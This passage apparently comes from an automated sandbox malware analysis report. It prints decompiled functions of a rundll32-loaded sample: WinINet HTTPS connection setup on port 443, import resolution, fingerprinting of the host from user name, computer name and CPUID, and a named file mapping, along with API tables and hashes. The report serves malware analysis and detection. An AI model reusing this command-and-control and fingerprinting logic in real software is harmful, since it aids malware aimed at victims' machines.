				if(_t34 == 0 || InternetSetStatusCallback(_t34, E0428A7F1) == 0xffffffff) {
					L15:
					return GetLastError();
				} else {
					ResetEvent( *(_t65 + 0x1c));
					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x1bb, 0, 0, 3, 0, _t65); // executed
					 *(_t65 + 0x14) = _t38;
					if(_t38 != 0 || GetLastError() == 0x3e5 && E042829C0( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
						_t59 =  *0x428d2a8; // 0xaea5a8
						_t15 = _t59 + 0x428e743; // 0x544547
						_v8 = 0x84c03180;
						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84c03180, _t65); // executed
						 *(_t65 + 0x18) = _t40;
						if(_t40 == 0) {
							goto L15;
						}
						_t57 = 4;
						_v12 = _t57;
						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
							_v8 = _v8 | 0x00000100;
							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
						}
						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
							goto L15;
						} else {
							return 0;
						}
					} else {
						goto L15;
					}
				}
			}














                                0x0428a85c
                                0x0428a85c
                                0x0428a867
                                0x0428a86e
                                0x0428a876
                                0x0428a880
                                0x0428a886
                                0x0428a899
                                0x0428a8a9
                                0x0428a89b
                                0x0428a89e
                                0x0428a8a3
                                0x0428a8a3
                                0x0428a899
                                0x0428a8b9
                                0x0428a8bf
                                0x0428a8c4
                                0x0428a9b0
                                0x00000000
                                0x0428a8df
                                0x0428a8e2
                                0x0428a8f8
                                0x0428a8fe
                                0x0428a903
                                0x0428a92b
                                0x0428a93e
                                0x0428a948
                                0x0428a94b
                                0x0428a951
                                0x0428a956
                                0x00000000
                                0x00000000
                                0x0428a95a
                                0x0428a966
                                0x0428a977
                                0x0428a979
                                0x0428a98a
                                0x0428a98a
                                0x0428a99a
                                0x00000000
                                0x0428a9ac
                                0x00000000
                                0x0428a9ac
                                0x00000000
                                0x00000000
                                0x00000000
                                0x0428a903

                                APIs
                                • lstrlen.KERNEL32(?,00000008,74E04D40), ref: 0428A86E
                                  • Part of subcall function 04281525: RtlAllocateHeap.NTDLL(00000000,00000000,04281278), ref: 04281531
                                • InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 0428A891
                                • InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 0428A8B9
                                • InternetSetStatusCallback.WININET(00000000,0428A7F1), ref: 0428A8D0
                                • ResetEvent.KERNEL32(?), ref: 0428A8E2
                                • InternetConnectA.WININET(?,?,000001BB,00000000,00000000,00000003,00000000,?), ref: 0428A8F8
                                • GetLastError.KERNEL32 ref: 0428A905
                                • HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84C03180,?), ref: 0428A94B
                                • InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 0428A969
                                • InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 0428A98A
                                • InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 0428A996
                                • InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 0428A9A6
                                • GetLastError.KERNEL32 ref: 0428A9B0
                                  • Part of subcall function 04288B22: RtlFreeHeap.NTDLL(00000000,00000000,0428131A,00000000,?,?,00000000), ref: 04288B2E
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
                                • String ID:
                                • API String ID: 2290446683-0
                                • Opcode ID: 9745d1963a17838a2db388a0ba2edac69fa1447fc9580386a1551026ae8362d5
                                • Instruction ID: 7f4d9ada30f432c85bbcbb8859d0611917e134db626e1cf9bbe5c130ccf942ff
                                • Opcode Fuzzy Hash: 9745d1963a17838a2db388a0ba2edac69fa1447fc9580386a1551026ae8362d5
                                • Instruction Fuzzy Hash: 11417B71712204BBD721AFA5EC88E5F7ABDEF89700B10492EF542E20D0EB35B905CA20
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0428AC95, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209libraryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 97 428ac95-428acfa 98 428ad1b-428ad45 97->98 99 428acfc-428ad16 RaiseException 97->99 101 428ad4a-428ad56 98->101 102 428ad47 98->102 100 428aecb-428aecf 99->100 103 428ad58-428ad63 101->103 104 428ad69-428ad6b 101->104 102->101 103->104 114 428aeae-428aeb5 103->114 105 428ad71-428ad78 104->105 106 428ae13-428ae1d 104->106 110 428ad88-428ad95 LoadLibraryA 105->110 111 428ad7a-428ad86 105->111 108 428ae29-428ae2b 106->108 109 428ae1f-428ae27 106->109 115 428aea9-428aeac 108->115 116 428ae2d-428ae30 108->116 109->108 112 428add8-428ade4 InterlockedExchange 110->112 113 428ad97-428ada7 GetLastError 110->113 111->110 111->112 121 428ae0c-428ae0d FreeLibrary 112->121 122 428ade6-428adea 112->122 119 428ada9-428adb5 113->119 120 428adb7-428add3 RaiseException 113->120 124 428aec9 114->124 125 428aeb7-428aec4 114->125 115->114 117 428ae5e-428ae6c GetProcAddress 116->117 118 428ae32-428ae35 116->118 117->115 128 428ae6e-428ae7e GetLastError 117->128 118->117 127 428ae37-428ae42 118->127 119->112 119->120 120->100 121->106 122->106 129 428adec-428adf8 LocalAlloc 122->129 124->100 125->124 127->117 130 428ae44-428ae4a 127->130 132 428ae8a-428ae8c 128->132 133 428ae80-428ae88 128->133 129->106 134 428adfa-428ae0a 129->134 130->117 135 428ae4c-428ae4f 130->135 132->115 136 428ae8e-428aea6 RaiseException 132->136 133->132 134->106 135->117 137 428ae51-428ae5c 135->137 136->115 137->115 137->117
                                C-Code - Quality: 51%
                                			E0428AC95(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				struct HINSTANCE__* _t99;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x4280000;
				_t115 = _t139[3] + 0x4280000;
				_t131 = _t139[4] + 0x4280000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x4280000;
				_v16 = _t139[5] + 0x4280000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x4280002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x428d1a0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x428d1a0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x428d1a0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x428d19c; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x428d1a0; // 0x0
					if(_t98 == 0) {
						L9:
						_t99 = LoadLibraryA(_v60); // executed
						_t138 = _t99;
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x428d198; // 0x0
										 *_t102 = _t125;
										 *0x428d198 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x428d19c; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}


































                                0x0428aca4
                                0x0428acba
                                0x0428acc0
                                0x0428acc2
                                0x0428acc7
                                0x0428accd
                                0x0428acd2
                                0x0428acd5
                                0x0428ace3
                                0x0428acea
                                0x0428aced
                                0x0428acf0
                                0x0428acf1
                                0x0428acf4
                                0x0428acf7
                                0x0428acfa
                                0x0428acff
                                0x0428ad0e
                                0x00000000
                                0x0428ad14
                                0x0428ad1e
                                0x0428ad28
                                0x0428ad2d
                                0x0428ad2f
                                0x0428ad39
                                0x0428ad3c
                                0x0428ad3f
                                0x0428ad45
                                0x0428ad47
                                0x0428ad47
                                0x0428ad4a
                                0x0428ad4d
                                0x0428ad52
                                0x0428ad56
                                0x0428ad69
                                0x0428ad6b
                                0x0428ae13
                                0x0428ae13
                                0x0428ae1a
                                0x0428ae1d
                                0x0428ae27
                                0x0428ae27
                                0x0428ae2b
                                0x0428aea9
                                0x0428aeac
                                0x0428aeae
                                0x0428aeae
                                0x0428aeb5
                                0x0428aeb7
                                0x0428aec1
                                0x0428aec4
                                0x0428aec7
                                0x0428aec7
                                0x00000000
                                0x0428ae2d
                                0x0428ae30
                                0x0428ae5e
                                0x0428ae68
                                0x0428ae6c
                                0x0428ae74
                                0x0428ae77
                                0x0428ae7e
                                0x0428ae88
                                0x0428ae88
                                0x0428ae8c
                                0x0428ae91
                                0x0428aea0
                                0x0428aea6
                                0x0428aea6
                                0x0428ae8c
                                0x00000000
                                0x0428ae37
                                0x0428ae3a
                                0x0428ae42
                                0x0428ae57
                                0x0428ae5c
                                0x00000000
                                0x00000000
                                0x0428ae5c
                                0x00000000
                                0x0428ae42
                                0x0428ae30
                                0x0428ae2b
                                0x0428ad71
                                0x0428ad78
                                0x0428ad88
                                0x0428ad8b
                                0x0428ad91
                                0x0428ad95
                                0x0428add8
                                0x0428ade4
                                0x0428ae0d
                                0x0428ade6
                                0x0428adea
                                0x0428adf0
                                0x0428adf8
                                0x0428adfa
                                0x0428adfd
                                0x0428ae03
                                0x0428ae05
                                0x0428ae05
                                0x0428adf8
                                0x0428adea
                                0x00000000
                                0x0428ade4
                                0x0428ad9d
                                0x0428ada0
                                0x0428ada7
                                0x0428adb7
                                0x0428adba
                                0x0428adca
                                0x00000000
                                0x0428add0
                                0x0428adb1
                                0x0428adb5
                                0x00000000
                                0x00000000
                                0x00000000
                                0x0428adb5
                                0x0428ad82
                                0x0428ad86
                                0x00000000
                                0x00000000
                                0x00000000
                                0x0428ad86
                                0x0428ad5f
                                0x0428ad63
                                0x00000000
                                0x00000000
                                0x00000000

                                APIs
                                • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0428AD0E
                                • LoadLibraryA.KERNEL32(?), ref: 0428AD8B
                                • GetLastError.KERNEL32 ref: 0428AD97
                                • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 0428ADCA
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                • String ID: $
                                • API String ID: 948315288-3993045852
                                • Opcode ID: e1b44a9fab27bdc3af5b42c698ab3b09301a025222dc0429c15ccdd03f1904c1
                                • Instruction ID: 44dcb9467296c9bddee41cec102f5b4ff13c72692fdb244bf49c18f19e0faf02
                                • Opcode Fuzzy Hash: e1b44a9fab27bdc3af5b42c698ab3b09301a025222dc0429c15ccdd03f1904c1
                                • Instruction Fuzzy Hash: F7813C71B12606AFDB21DF99D884AADB7F5EF48711F10842EE905E7280EB74E905CB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04287A2E, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 103memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 139 4287a2e-4287a42 140 4287a4c-4287a5e call 4284f97 139->140 141 4287a44-4287a49 139->141 144 4287a60-4287a70 GetUserNameW 140->144 145 4287ab2-4287abf 140->145 141->140 146 4287ac1-4287ad8 GetComputerNameW 144->146 147 4287a72-4287a82 RtlAllocateHeap 144->147 145->146 149 4287ada-4287aeb RtlAllocateHeap 146->149 150 4287b16-4287b3a 146->150 147->146 148 4287a84-4287a91 GetUserNameW 147->148 151 4287aa1-4287ab0 148->151 152 4287a93-4287a9f call 4282c0d 148->152 149->150 153 4287aed-4287af6 GetComputerNameW 149->153 151->146 152->151 154 4287af8-4287b04 call 4282c0d 153->154 155 4287b07-4287b0a 153->155 154->155 155->150
                                C-Code - Quality: 96%
                                			E04287A2E(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x428d270; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E04284F97( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x428d2a4 ^ 0x46d76429;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x428d238, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E04282C0D(_v8 + _v8, _t64);
							}
							HeapFree( *0x428d238, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x428d238, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E04282C0D(_v8 + _v8, _t64);
						}
						HeapFree( *0x428d238, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}



















                                0x04287a2e
                                0x04287a36
                                0x04287a3a
                                0x04287a3d
                                0x04287a42
                                0x04287a44
                                0x04287a49
                                0x04287a49
                                0x04287a4f
                                0x04287a51
                                0x04287a5e
                                0x04287abf
                                0x04287a60
                                0x04287a65
                                0x04287a6b
                                0x04287a70
                                0x04287a7e
                                0x04287a82
                                0x04287a91
                                0x04287a98
                                0x04287a9f
                                0x04287a9f
                                0x04287aaa
                                0x04287aaa
                                0x04287a82
                                0x04287a70
                                0x04287ac1
                                0x04287ac7
                                0x04287ad1
                                0x04287ad3
                                0x04287ad8
                                0x04287ae7
                                0x04287aeb
                                0x04287af6
                                0x04287afd
                                0x04287b04
                                0x04287b04
                                0x04287b10
                                0x04287b10
                                0x04287aeb
                                0x04287b1b
                                0x04287b1d
                                0x04287b20
                                0x04287b22
                                0x04287b25
                                0x04287b28
                                0x04287b32
                                0x04287b36
                                0x04287b3a

                                APIs
                                • GetUserNameW.ADVAPI32(00000000,?), ref: 04287A65
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 04287A7C
                                • GetUserNameW.ADVAPI32(00000000,?), ref: 04287A89
                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,042830EE), ref: 04287AAA
                                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04287AD1
                                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04287AE5
                                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04287AF2
                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,042830EE), ref: 04287B10
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: HeapName$AllocateComputerFreeUser
                                • String ID: Ut
                                • API String ID: 3239747167-8415677
                                • Opcode ID: 627ded8b904735eae4bb48f3d6951e5537d65d41276619ae4347143817ad2766
                                • Instruction ID: d4c7802aa08b69ee2cb9fb3a54c2e171d26cc442893927bd41750172e228f812
                                • Opcode Fuzzy Hash: 627ded8b904735eae4bb48f3d6951e5537d65d41276619ae4347143817ad2766
                                • Instruction Fuzzy Hash: 16311A71B11206EFE710EFA9EC84A6EB7F9EF84314B25446DE505D7290EB34EE059B20
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04288E0D, Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 74%
                                			E04288E0D(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L0428AF68();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x428d2a8; // 0xaea5a8
				_t5 = _t13 + 0x428e87e; // 0x4d78e26
				_t6 = _t13 + 0x428e59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L0428AC0A();
				_t17 = CreateFileMappingW(0xffffffff, 0x428d2ac, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                                0x04288e0d
                                0x04288e15
                                0x04288e19
                                0x04288e1f
                                0x04288e24
                                0x04288e29
                                0x04288e2c
                                0x04288e2f
                                0x04288e34
                                0x04288e35
                                0x04288e38
                                0x04288e3d
                                0x04288e44
                                0x04288e4e
                                0x04288e50
                                0x04288e51
                                0x04288e54
                                0x04288e70
                                0x04288e76
                                0x04288e7a
                                0x04288ec8
                                0x04288e7c
                                0x04288e89
                                0x04288e99
                                0x04288ea1
                                0x04288eb3
                                0x04288eb7
                                0x00000000
                                0x00000000
                                0x04288ea3
                                0x04288ea6
                                0x04288eab
                                0x04288ead
                                0x04288ead
                                0x04288e8b
                                0x04288e8d
                                0x04288eb9
                                0x04288eba
                                0x04288eba
                                0x04288e89
                                0x04288ecf

                                APIs
                                • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,04282FFF,?,?,4D283A53,?,?), ref: 04288E19
                                • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 04288E2F
                                • _snwprintf.NTDLL ref: 04288E54
                                • CreateFileMappingW.KERNELBASE(000000FF,0428D2AC,00000004,00000000,00001000,?), ref: 04288E70
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,04282FFF,?,?,4D283A53), ref: 04288E82
                                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 04288E99
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,04282FFF,?,?), ref: 04288EBA
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,04282FFF,?,?,4D283A53), ref: 04288EC2
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                • String ID:
                                • API String ID: 1814172918-0
                                • Opcode ID: 15c5198ddc86c59d75872fb78e8bbb6aa877362f485741a4ea97103ac44f5098
                                • Instruction ID: 862b2bbd9c9e6f714c434eb799764b6df8f4364790cca49bf68ae995c6b9509a
                                • Opcode Fuzzy Hash: 15c5198ddc86c59d75872fb78e8bbb6aa877362f485741a4ea97103ac44f5098
                                • Instruction Fuzzy Hash: 9721D572B22204FBE711BB68EC09F9E37A9EB44750F210129F605E71C0EB70E904CB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 042858DB, Relevance: 12.1, APIs: 8, Instructions: 75networkCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 93%
                                			E042858DB(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t21;
				intOrPtr _t24;
				void* _t37;
				void* _t41;
				intOrPtr* _t45;

				_t41 = __edi;
				_t37 = __ebx;
				_t45 = __eax;
				_t16 =  *((intOrPtr*)(__eax + 0x20));
				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
					E042829C0(_t16, __ecx, 0xea60);
				}
				_t17 =  *(_t45 + 0x18);
				_push(_t37);
				_push(_t41);
				if(_t17 != 0) {
					InternetSetStatusCallback(_t17, 0);
					InternetCloseHandle( *(_t45 + 0x18)); // executed
				}
				_t18 =  *(_t45 + 0x14);
				if(_t18 != 0) {
					InternetSetStatusCallback(_t18, 0);
					InternetCloseHandle( *(_t45 + 0x14));
				}
				_t19 =  *(_t45 + 0x10);
				if(_t19 != 0) {
					InternetSetStatusCallback(_t19, 0);
					InternetCloseHandle( *(_t45 + 0x10));
				}
				_t20 =  *(_t45 + 0x1c);
				if(_t20 != 0) {
					CloseHandle(_t20);
				}
				_t21 =  *(_t45 + 0x20);
				if(_t21 != 0) {
					CloseHandle(_t21);
				}
				_t22 =  *((intOrPtr*)(_t45 + 8));
				if( *((intOrPtr*)(_t45 + 8)) != 0) {
					E04288B22(_t22);
					 *((intOrPtr*)(_t45 + 8)) = 0;
					 *((intOrPtr*)(_t45 + 0x30)) = 0;
				}
				_t23 =  *((intOrPtr*)(_t45 + 0xc));
				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
					E04288B22(_t23);
				}
				_t24 =  *_t45;
				if(_t24 != 0) {
					_t24 = E04288B22(_t24);
				}
				_t46 =  *((intOrPtr*)(_t45 + 4));
				if( *((intOrPtr*)(_t45 + 4)) != 0) {
					return E04288B22(_t46);
				}
				return _t24;
			}












                                0x042858db
                                0x042858db
                                0x042858dd
                                0x042858df
                                0x042858e6
                                0x042858ed
                                0x042858ed
                                0x042858f2
                                0x042858f5
                                0x042858fc
                                0x04285905
                                0x04285909
                                0x0428590e
                                0x0428590e
                                0x04285910
                                0x04285915
                                0x04285919
                                0x0428591e
                                0x0428591e
                                0x04285920
                                0x04285925
                                0x04285929
                                0x0428592e
                                0x0428592e
                                0x04285930
                                0x0428593b
                                0x0428593e
                                0x0428593e
                                0x04285940
                                0x04285945
                                0x04285948
                                0x04285948
                                0x0428594a
                                0x04285951
                                0x04285954
                                0x04285959
                                0x0428595c
                                0x0428595c
                                0x0428595f
                                0x04285964
                                0x04285967
                                0x04285967
                                0x0428596c
                                0x04285970
                                0x04285973
                                0x04285973
                                0x04285978
                                0x0428597d
                                0x00000000
                                0x04285980
                                0x04285987

                                APIs
                                • InternetSetStatusCallback.WININET(?,00000000), ref: 04285909
                                • InternetCloseHandle.WININET(?), ref: 0428590E
                                • InternetSetStatusCallback.WININET(?,00000000), ref: 04285919
                                • InternetCloseHandle.WININET(?), ref: 0428591E
                                • InternetSetStatusCallback.WININET(?,00000000), ref: 04285929
                                • InternetCloseHandle.WININET(?), ref: 0428592E
                                • CloseHandle.KERNEL32(?,00000000,00000102,?,?,042893DC,?,?,00000000,00000000,74E481D0), ref: 0428593E
                                • CloseHandle.KERNEL32(?,00000000,00000102,?,?,042893DC,?,?,00000000,00000000,74E481D0), ref: 04285948
                                  • Part of subcall function 042829C0: WaitForMultipleObjects.KERNEL32(00000002,0428A923,00000000,0428A923,?,?,?,0428A923,0000EA60), ref: 042829DB
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: Internet$CloseHandle$CallbackStatus$MultipleObjectsWait
                                • String ID:
                                • API String ID: 2824497044-0
                                • Opcode ID: f8afa8e800311c4b20aa6523100188b32f3b7283954f1101a1bb0a2a50653a0c
                                • Instruction ID: d230561d8098b1ec5ef2f4070ac4071d2253d8384087d25a8faf57663069683d
                                • Opcode Fuzzy Hash: f8afa8e800311c4b20aa6523100188b32f3b7283954f1101a1bb0a2a50653a0c
                                • Instruction Fuzzy Hash: E7110076721649ABC630BEAAEC84C1FF7E9FF843243954D1DE096D3590C725FC888A64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0428A2C6, Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 100%
                                			E0428A2C6(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
